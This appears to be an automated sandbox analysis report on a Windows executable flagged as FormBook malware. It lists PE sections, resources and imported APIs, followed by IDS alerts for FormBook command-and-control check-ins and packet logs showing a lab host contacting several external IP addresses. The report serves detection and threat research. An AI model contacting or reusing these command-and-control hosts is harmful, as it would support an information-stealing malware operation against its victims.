.rsrc | 0xc7000 | 0x595ac | 0x59600 | 2ecdbf4ef693503ae6300903bbd504d3 | False | 0.9269176136363636 | data | 7.891009570516618 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0x121000 | 0x711c | 0x7200 | 6fcae3cbbf6bfbabf5ec5bbe7cf612c3 | False | 0.7650767543859649 | data | 6.779031650454199 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xc75a8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.7466216216216216
RT_ICON | 0xc76d0 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colors | English | Great Britain | 0.3277027027027027
RT_ICON | 0xc77f8 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 192 | English | Great Britain | 0.3885135135135135
RT_ICON | 0xc7920 | 0x2e8 | Device independent bitmap graphic, 32 x 64 x 4, image size 0 | English | Great Britain | 0.3333333333333333
RT_ICON | 0xc7c08 | 0x128 | Device independent bitmap graphic, 16 x 32 x 4, image size 0 | English | Great Britain | 0.5
RT_ICON | 0xc7d30 | 0xea8 | Device independent bitmap graphic, 48 x 96 x 8, image size 0 | English | Great Britain | 0.2835820895522388
RT_ICON | 0xc8bd8 | 0x8a8 | Device independent bitmap graphic, 32 x 64 x 8, image size 0 | English | Great Britain | 0.37906137184115524
RT_ICON | 0xc9480 | 0x568 | Device independent bitmap graphic, 16 x 32 x 8, image size 0 | English | Great Britain | 0.23699421965317918
RT_ICON | 0xc99e8 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 0 | English | Great Britain | 0.13858921161825727
RT_ICON | 0xcbf90 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 0 | English | Great Britain | 0.25070356472795496
RT_ICON | 0xcd038 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 0 | English | Great Britain | 0.3173758865248227
RT_MENU | 0xcd4a0 | 0x50 | data | English | Great Britain | 0.9
RT_STRING | 0xcd4f0 | 0x594 | data | English | Great Britain | 0.3333333333333333
RT_STRING | 0xcda84 | 0x68a | data | English | Great Britain | 0.2747909199522103
RT_STRING | 0xce110 | 0x490 | data | English | Great Britain | 0.3715753424657534
RT_STRING | 0xce5a0 | 0x5fc | data | English | Great Britain | 0.3087467362924282
RT_STRING | 0xceb9c | 0x65c | data | English | Great Britain | 0.34336609336609336
RT_STRING | 0xcf1f8 | 0x466 | data | English | Great Britain | 0.3605683836589698
RT_STRING | 0xcf660 | 0x158 | Matlab v4 mat-file (little endian) n, numeric, rows 0, columns 0 | English | Great Britain | 0.502906976744186
RT_RCDATA | 0xcf7b8 | 0x50871 | data | | | 1.0003365257806034
RT_GROUP_ICON | 0x12002c | 0x76 | data | English | Great Britain | 0.6610169491525424
RT_GROUP_ICON | 0x1200a4 | 0x14 | data | English | Great Britain | 1.25
RT_GROUP_ICON | 0x1200b8 | 0x14 | data | English | Great Britain | 1.15
RT_GROUP_ICON | 0x1200cc | 0x14 | data | English | Great Britain | 1.25
RT_VERSION | 0x1200e0 | 0xdc | data | English | Great Britain | 0.6181818181818182
RT_MANIFEST | 0x1201bc | 0x3ef | ASCII text, with CRLF line terminators | English | Great Britain | 0.5074478649453823
DLL | Import
WSOCK32.dll | WSACleanup, socket, inet_ntoa, setsockopt, ntohs, recvfrom, ioctlsocket, htons, WSAStartup, __WSAFDIsSet, select, accept, listen, bind, closesocket, WSAGetLastError, recv, sendto, send, inet_addr, gethostbyname, gethostname, connect
VERSION.dll | GetFileVersionInfoW, GetFileVersionInfoSizeW, VerQueryValueW
WINMM.dll | timeGetTime, waveOutSetVolume, mciSendStringW
COMCTL32.dll | ImageList_ReplaceIcon, ImageList_Destroy, ImageList_Remove, ImageList_SetDragCursorImage, ImageList_BeginDrag, ImageList_DragEnter, ImageList_DragLeave, ImageList_EndDrag, ImageList_DragMove, InitCommonControlsEx, ImageList_Create
MPR.dll | WNetUseConnectionW, WNetCancelConnection2W, WNetGetConnectionW, WNetAddConnection2W
WININET.dll | InternetQueryDataAvailable, InternetCloseHandle, InternetOpenW, InternetSetOptionW, InternetCrackUrlW, HttpQueryInfoW, InternetQueryOptionW, HttpOpenRequestW, HttpSendRequestW, FtpOpenFileW, FtpGetFileSize, InternetOpenUrlW, InternetReadFile, InternetConnectW
PSAPI.DLL | GetProcessMemoryInfo
IPHLPAPI.DLL | IcmpCreateFile, IcmpCloseHandle, IcmpSendEcho
USERENV.dll | DestroyEnvironmentBlock, UnloadUserProfile, CreateEnvironmentBlock, LoadUserProfileW
UxTheme.dll | IsThemeActive
KERNEL32.dll | DuplicateHandle, CreateThread, WaitForSingleObject, HeapAlloc, GetProcessHeap, HeapFree, Sleep, GetCurrentThreadId, MultiByteToWideChar, MulDiv, GetVersionExW, IsWow64Process, GetSystemInfo, FreeLibrary, LoadLibraryA, GetProcAddress, SetErrorMode, GetModuleFileNameW, WideCharToMultiByte, lstrcpyW, lstrlenW, GetModuleHandleW, QueryPerformanceCounter, VirtualFreeEx, OpenProcess, VirtualAllocEx, WriteProcessMemory, ReadProcessMemory, CreateFileW, SetFilePointerEx, SetEndOfFile, ReadFile, WriteFile, FlushFileBuffers, TerminateProcess, CreateToolhelp32Snapshot, Process32FirstW, Process32NextW, SetFileTime, GetFileAttributesW, FindFirstFileW, SetCurrentDirectoryW, GetLongPathNameW, GetShortPathNameW, DeleteFileW, FindNextFileW, CopyFileExW, MoveFileW, CreateDirectoryW, RemoveDirectoryW, SetSystemPowerState, QueryPerformanceFrequency, FindResourceW, LoadResource, LockResource, SizeofResource, EnumResourceNamesW, OutputDebugStringW, GetTempPathW, GetTempFileNameW, DeviceIoControl, GetLocalTime, CompareStringW, GetCurrentProcess, EnterCriticalSection, LeaveCriticalSection, GetStdHandle, CreatePipe, InterlockedExchange, TerminateThread, LoadLibraryExW, FindResourceExW, CopyFileW, VirtualFree, FormatMessageW, GetExitCodeProcess, GetPrivateProfileStringW, WritePrivateProfileStringW, GetPrivateProfileSectionW, WritePrivateProfileSectionW, GetPrivateProfileSectionNamesW, FileTimeToLocalFileTime, FileTimeToSystemTime, SystemTimeToFileTime, LocalFileTimeToFileTime, GetDriveTypeW, GetDiskFreeSpaceExW, GetDiskFreeSpaceW, GetVolumeInformationW, SetVolumeLabelW, CreateHardLinkW, SetFileAttributesW, CreateEventW, SetEvent, GetEnvironmentVariableW, SetEnvironmentVariableW, GlobalLock, GlobalUnlock, GlobalAlloc, GetFileSize, GlobalFree, GlobalMemoryStatusEx, Beep, GetSystemDirectoryW, HeapReAlloc, HeapSize, GetComputerNameW, GetWindowsDirectoryW, GetCurrentProcessId, GetProcessIoCounters, CreateProcessW, GetProcessId, SetPriorityClass, LoadLibraryW, VirtualAlloc, IsDebuggerPresent, GetCurrentDirectoryW, lstrcmpiW, DecodePointer, GetLastError, RaiseException, InitializeCriticalSectionAndSpinCount, DeleteCriticalSection, InterlockedDecrement, InterlockedIncrement, GetCurrentThread, CloseHandle, GetFullPathNameW, EncodePointer, ExitProcess, GetModuleHandleExW, ExitThread, GetSystemTimeAsFileTime, ResumeThread, GetCommandLineW, IsProcessorFeaturePresent, IsValidCodePage, GetACP, GetOEMCP, GetCPInfo, SetLastError, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, GetStartupInfoW, GetStringTypeW, SetStdHandle, GetFileType, GetConsoleCP, GetConsoleMode, RtlUnwind, ReadConsoleW, GetTimeZoneInformation, GetDateFormatW, GetTimeFormatW, LCMapStringW, GetEnvironmentStringsW, FreeEnvironmentStringsW, WriteConsoleW, FindClose, SetEnvironmentVariableA
USER32.dll | AdjustWindowRectEx, CopyImage, SetWindowPos, GetCursorInfo, RegisterHotKey, ClientToScreen, GetKeyboardLayoutNameW, IsCharAlphaW, IsCharAlphaNumericW, IsCharLowerW, IsCharUpperW, GetMenuStringW, GetSubMenu, GetCaretPos, IsZoomed, MonitorFromPoint, GetMonitorInfoW, SetWindowLongW, SetLayeredWindowAttributes, FlashWindow, GetClassLongW, TranslateAcceleratorW, IsDialogMessageW, GetSysColor, InflateRect, DrawFocusRect, DrawTextW, FrameRect, DrawFrameControl, FillRect, PtInRect, DestroyAcceleratorTable, CreateAcceleratorTableW, SetCursor, GetWindowDC, GetSystemMetrics, GetActiveWindow, CharNextW, wsprintfW, RedrawWindow, DrawMenuBar, DestroyMenu, SetMenu, GetWindowTextLengthW, CreateMenu, IsDlgButtonChecked, DefDlgProcW, CallWindowProcW, ReleaseCapture, SetCapture, CreateIconFromResourceEx, mouse_event, ExitWindowsEx, SetActiveWindow, FindWindowExW, EnumThreadWindows, SetMenuDefaultItem, InsertMenuItemW, IsMenu, TrackPopupMenuEx, GetCursorPos, DeleteMenu, SetRect, GetMenuItemID, GetMenuItemCount, SetMenuItemInfoW, GetMenuItemInfoW, SetForegroundWindow, IsIconic, FindWindowW, MonitorFromRect, keybd_event, SendInput, GetAsyncKeyState, SetKeyboardState, GetKeyboardState, GetKeyState, VkKeyScanW, LoadStringW, DialogBoxParamW, MessageBeep, EndDialog, SendDlgItemMessageW, GetDlgItem, SetWindowTextW, CopyRect, ReleaseDC, GetDC, EndPaint, BeginPaint, GetClientRect, GetMenu, DestroyWindow, EnumWindows, GetDesktopWindow, IsWindow, IsWindowEnabled, IsWindowVisible, EnableWindow, InvalidateRect, GetWindowLongW, GetWindowThreadProcessId, AttachThreadInput, GetFocus, GetWindowTextW, ScreenToClient, SendMessageTimeoutW, EnumChildWindows, CharUpperBuffW, GetParent, GetDlgCtrlID, SendMessageW, MapVirtualKeyW, PostMessageW, GetWindowRect, SetUserObjectSecurity, CloseDesktop, CloseWindowStation, OpenDesktopW, SetProcessWindowStation, GetProcessWindowStation, OpenWindowStationW, GetUserObjectSecurity, MessageBoxW, DefWindowProcW, SetClipboardData, EmptyClipboard, CountClipboardFormats, CloseClipboard, GetClipboardData, IsClipboardFormatAvailable, OpenClipboard, BlockInput, GetMessageW, LockWindowUpdate, DispatchMessageW, TranslateMessage, PeekMessageW, UnregisterHotKey, CheckMenuRadioItem, CharLowerBuffW, MoveWindow, SetFocus, PostQuitMessage, KillTimer, CreatePopupMenu, RegisterWindowMessageW, SetTimer, ShowWindow, CreateWindowExW, RegisterClassExW, LoadIconW, LoadCursorW, GetSysColorBrush, GetForegroundWindow, MessageBoxA, DestroyIcon, SystemParametersInfoW, LoadImageW, GetClassNameW
GDI32.dll | StrokePath, DeleteObject, GetTextExtentPoint32W, ExtCreatePen, GetDeviceCaps, EndPath, SetPixel, CloseFigure, CreateCompatibleBitmap, CreateCompatibleDC, SelectObject, StretchBlt, GetDIBits, LineTo, AngleArc, MoveToEx, Ellipse, DeleteDC, GetPixel, CreateDCW, GetStockObject, GetTextFaceW, CreateFontW, SetTextColor, PolyDraw, BeginPath, Rectangle, SetViewportOrgEx, GetObjectW, SetBkMode, RoundRect, SetBkColor, CreatePen, CreateSolidBrush, StrokeAndFillPath
COMDLG32.dll | GetOpenFileNameW, GetSaveFileNameW
ADVAPI32.dll | GetAce, RegEnumValueW, RegDeleteValueW, RegDeleteKeyW, RegEnumKeyExW, RegSetValueExW, RegOpenKeyExW, RegCloseKey, RegQueryValueExW, RegConnectRegistryW, InitializeSecurityDescriptor, InitializeAcl, AdjustTokenPrivileges, OpenThreadToken, OpenProcessToken, LookupPrivilegeValueW, DuplicateTokenEx, CreateProcessAsUserW, CreateProcessWithLogonW, GetLengthSid, CopySid, LogonUserW, AllocateAndInitializeSid, CheckTokenMembership, RegCreateKeyExW, FreeSid, GetTokenInformation, GetSecurityDescriptorDacl, GetAclInformation, AddAce, SetSecurityDescriptorDacl, GetUserNameW, InitiateSystemShutdownExW
SHELL32.dll | DragQueryPoint, ShellExecuteExW, DragQueryFileW, SHEmptyRecycleBinW, SHGetPathFromIDListW, SHBrowseForFolderW, SHCreateShellItem, SHGetDesktopFolder, SHGetSpecialFolderLocation, SHGetFolderPathW, SHFileOperationW, ExtractIconExW, Shell_NotifyIconW, ShellExecuteW, DragFinish
ole32.dll | CoTaskMemAlloc, CoTaskMemFree, CLSIDFromString, ProgIDFromCLSID, CLSIDFromProgID, OleSetMenuDescriptor, MkParseDisplayName, OleSetContainedObject, CoCreateInstance, IIDFromString, StringFromGUID2, CreateStreamOnHGlobal, OleInitialize, OleUninitialize, CoInitialize, CoUninitialize, GetRunningObjectTable, CoGetInstanceFromFile, CoGetObject, CoSetProxyBlanket, CoCreateInstanceEx, CoInitializeSecurity
OLEAUT32.dll | LoadTypeLibEx, VariantCopyInd, SysReAllocString, SysFreeString, SafeArrayDestroyDescriptor, SafeArrayDestroyData, SafeArrayUnaccessData, SafeArrayAccessData, SafeArrayAllocData, SafeArrayAllocDescriptorEx, SafeArrayCreateVector, RegisterTypeLib, CreateStdDispatch, DispCallFunc, VariantChangeType, SysStringLen, VariantTimeToSystemTime, VarR8FromDec, SafeArrayGetVartype, VariantCopy, VariantClear, OleLoadPicture, QueryPathOfRegTypeLib, RegisterTypeLibForUser, UnRegisterTypeLibForUser, UnRegisterTypeLib, CreateDispTypeInfo, SysAllocString, VariantInit
Language of compilation system | Country where language is spoken | Map
English | Great Britain |
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2025-01-10T23:05:40.618251+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.9 | 49974 | 188.114.97.3 | 80 | TCP
2025-01-10T23:05:40.618251+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.9 | 49974 | 188.114.97.3 | 80 | TCP
2025-01-10T23:05:56.553179+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 49976 | 208.91.197.27 | 80 | TCP
2025-01-10T23:05:59.180842+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 49977 | 208.91.197.27 | 80 | TCP
2025-01-10T23:06:01.820857+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 49978 | 208.91.197.27 | 80 | TCP
2025-01-10T23:06:04.680350+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.9 | 49979 | 208.91.197.27 | 80 | TCP
2025-01-10T23:06:04.680350+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.9 | 49979 | 208.91.197.27 | 80 | TCP
2025-01-10T23:06:10.323108+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 49980 | 209.74.79.40 | 80 | TCP
2025-01-10T23:06:12.867599+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 49981 | 209.74.79.40 | 80 | TCP
2025-01-10T23:06:15.416830+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 49982 | 209.74.79.40 | 80 | TCP
2025-01-10T23:06:17.983468+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.9 | 49983 | 209.74.79.40 | 80 | TCP
2025-01-10T23:06:17.983468+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.9 | 49983 | 209.74.79.40 | 80 | TCP
2025-01-10T23:06:38.221913+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 49984 | 104.21.96.1 | 80 | TCP
2025-01-10T23:06:40.733955+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 49985 | 104.21.96.1 | 80 | TCP
2025-01-10T23:06:43.329442+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 49986 | 104.21.96.1 | 80 | TCP
2025-01-10T23:06:45.893450+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.9 | 49987 | 104.21.96.1 | 80 | TCP
2025-01-10T23:06:45.893450+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.9 | 49987 | 104.21.96.1 | 80 | TCP
2025-01-10T23:06:59.672017+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 49988 | 144.76.229.203 | 80 | TCP
2025-01-10T23:07:02.216873+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 49989 | 144.76.229.203 | 80 | TCP
2025-01-10T23:07:04.806807+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 49990 | 144.76.229.203 | 80 | TCP
2025-01-10T23:07:07.337601+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.9 | 49991 | 144.76.229.203 | 80 | TCP
2025-01-10T23:07:07.337601+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.9 | 49991 | 144.76.229.203 | 80 | TCP
2025-01-10T23:07:13.062340+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 49992 | 172.67.182.198 | 80 | TCP
2025-01-10T23:07:15.602706+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 49993 | 172.67.182.198 | 80 | TCP
2025-01-10T23:07:18.142286+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 49994 | 172.67.182.198 | 80 | TCP
2025-01-10T23:07:20.696839+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.9 | 49995 | 172.67.182.198 | 80 | TCP
2025-01-10T23:07:20.696839+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.9 | 49995 | 172.67.182.198 | 80 | TCP
2025-01-10T23:07:26.218382+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 49996 | 13.248.169.48 | 80 | TCP
2025-01-10T23:07:28.758948+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 49997 | 13.248.169.48 | 80 | TCP
2025-01-10T23:07:31.325757+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 49998 | 13.248.169.48 | 80 | TCP
2025-01-10T23:07:33.879744+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.9 | 49999 | 13.248.169.48 | 80 | TCP
2025-01-10T23:07:33.879744+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.9 | 49999 | 13.248.169.48 | 80 | TCP
2025-01-10T23:07:40.376353+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 50000 | 160.25.166.123 | 80 | TCP
2025-01-10T23:07:42.946312+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 50001 | 160.25.166.123 | 80 | TCP
2025-01-10T23:07:45.439322+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 50002 | 160.25.166.123 | 80 | TCP
2025-01-10T23:07:48.025418+0100 | 2050745 | ET MALWARE FormBook CnC Checkin (GET) M5 | 1 | 192.168.2.9 | 50003 | 160.25.166.123 | 80 | TCP
2025-01-10T23:07:48.025418+0100 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.9 | 50003 | 160.25.166.123 | 80 | TCP
2025-01-10T23:07:53.661162+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 50004 | 68.66.226.119 | 80 | TCP
2025-01-10T23:07:56.232725+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 50005 | 68.66.226.119 | 80 | TCP
2025-01-10T23:07:59.240228+0100 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.9 | 50006 | 68.66.226.119 | 80 | TCP
                                                          Jan 10, 2025 23:06:02.826966047 CET8049978208.91.197.27192.168.2.9
                                                          Jan 10, 2025 23:06:03.840934992 CET4997980192.168.2.9208.91.197.27
                                                          Jan 10, 2025 23:06:03.845838070 CET8049979208.91.197.27192.168.2.9
                                                          Jan 10, 2025 23:06:03.845933914 CET4997980192.168.2.9208.91.197.27
                                                          Jan 10, 2025 23:06:03.855287075 CET4997980192.168.2.9208.91.197.27
                                                          Jan 10, 2025 23:06:03.860109091 CET8049979208.91.197.27192.168.2.9
                                                          Jan 10, 2025 23:06:04.680166006 CET8049979208.91.197.27192.168.2.9
                                                          Jan 10, 2025 23:06:04.680180073 CET8049979208.91.197.27192.168.2.9
                                                          Jan 10, 2025 23:06:04.680191040 CET8049979208.91.197.27192.168.2.9
                                                          Jan 10, 2025 23:06:04.680201054 CET8049979208.91.197.27192.168.2.9
                                                          Jan 10, 2025 23:06:04.680350065 CET4997980192.168.2.9208.91.197.27
                                                          Jan 10, 2025 23:06:04.680397987 CET4997980192.168.2.9208.91.197.27
                                                          Jan 10, 2025 23:06:04.683244944 CET4997980192.168.2.9208.91.197.27
                                                          Jan 10, 2025 23:06:04.688055038 CET8049979208.91.197.27192.168.2.9
                                                          Jan 10, 2025 23:06:09.714384079 CET4998080192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:09.719261885 CET8049980209.74.79.40192.168.2.9
                                                          Jan 10, 2025 23:06:09.719376087 CET4998080192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:09.734184027 CET4998080192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:09.738970041 CET8049980209.74.79.40192.168.2.9
                                                          Jan 10, 2025 23:06:10.322408915 CET8049980209.74.79.40192.168.2.9
                                                          Jan 10, 2025 23:06:10.323036909 CET8049980209.74.79.40192.168.2.9
                                                          Jan 10, 2025 23:06:10.323107958 CET4998080192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:11.243794918 CET4998080192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:12.267899036 CET4998180192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:12.272774935 CET8049981209.74.79.40192.168.2.9
                                                          Jan 10, 2025 23:06:12.272898912 CET4998180192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:12.294816971 CET4998180192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:12.299691916 CET8049981209.74.79.40192.168.2.9
                                                          Jan 10, 2025 23:06:12.865439892 CET8049981209.74.79.40192.168.2.9
                                                          Jan 10, 2025 23:06:12.867403984 CET8049981209.74.79.40192.168.2.9
                                                          Jan 10, 2025 23:06:12.867599010 CET4998180192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:13.806314945 CET4998180192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:14.825144053 CET4998280192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:14.830040932 CET8049982209.74.79.40192.168.2.9
                                                          Jan 10, 2025 23:06:14.830149889 CET4998280192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:14.845164061 CET4998280192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:14.849962950 CET8049982209.74.79.40192.168.2.9
                                                          Jan 10, 2025 23:06:14.850059986 CET8049982209.74.79.40192.168.2.9
                                                          Jan 10, 2025 23:06:15.413546085 CET8049982209.74.79.40192.168.2.9
                                                          Jan 10, 2025 23:06:15.413599968 CET8049982209.74.79.40192.168.2.9
                                                          Jan 10, 2025 23:06:15.416830063 CET4998280192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:16.353363037 CET4998280192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:17.372308969 CET4998380192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:17.377353907 CET8049983209.74.79.40192.168.2.9
                                                          Jan 10, 2025 23:06:17.377480030 CET4998380192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:17.386873007 CET4998380192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:17.391906023 CET8049983209.74.79.40192.168.2.9
                                                          Jan 10, 2025 23:06:17.983237982 CET8049983209.74.79.40192.168.2.9
                                                          Jan 10, 2025 23:06:17.983407021 CET8049983209.74.79.40192.168.2.9
                                                          Jan 10, 2025 23:06:17.983468056 CET4998380192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:17.986701965 CET4998380192.168.2.9209.74.79.40
                                                          Jan 10, 2025 23:06:17.991605043 CET8049983209.74.79.40192.168.2.9
                                                          Jan 10, 2025 23:06:37.263490915 CET4998480192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:37.268373013 CET8049984104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:37.268449068 CET4998480192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:37.283664942 CET4998480192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:37.289695978 CET8049984104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:38.221787930 CET8049984104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:38.221834898 CET8049984104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:38.221913099 CET4998480192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:38.222182989 CET8049984104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:38.222237110 CET4998480192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:38.790708065 CET4998480192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:39.809793949 CET4998580192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:39.814812899 CET8049985104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:39.814932108 CET4998580192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:39.830147982 CET4998580192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:39.835015059 CET8049985104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:40.733803034 CET8049985104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:40.733850956 CET8049985104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:40.733954906 CET4998580192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:40.735115051 CET8049985104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:40.735174894 CET4998580192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:41.337651014 CET4998580192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:42.402326107 CET4998680192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:42.407263041 CET8049986104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:42.407376051 CET4998680192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:42.422694921 CET4998680192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:42.427598000 CET8049986104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:42.427706003 CET8049986104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:43.329308987 CET8049986104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:43.329379082 CET8049986104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:43.329442024 CET4998680192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:43.329649925 CET8049986104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:43.329708099 CET4998680192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:43.931508064 CET4998680192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:44.950434923 CET4998780192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:44.955319881 CET8049987104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:44.958460093 CET4998780192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:44.967472076 CET4998780192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:44.972266912 CET8049987104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:45.893230915 CET8049987104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:45.893243074 CET8049987104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:45.893450022 CET4998780192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:45.893960953 CET8049987104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:45.894015074 CET4998780192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:45.896260023 CET4998780192.168.2.9104.21.96.1
                                                          Jan 10, 2025 23:06:45.901082039 CET8049987104.21.96.1192.168.2.9
                                                          Jan 10, 2025 23:06:59.027504921 CET4998880192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:06:59.032407999 CET8049988144.76.229.203192.168.2.9
                                                          Jan 10, 2025 23:06:59.032521009 CET4998880192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:06:59.047230959 CET4998880192.168.2.9144.76.229.203
                                                          Jan 10, 2025 23:06:59.052105904 CET8049988144.76.229.203192.168.2.9
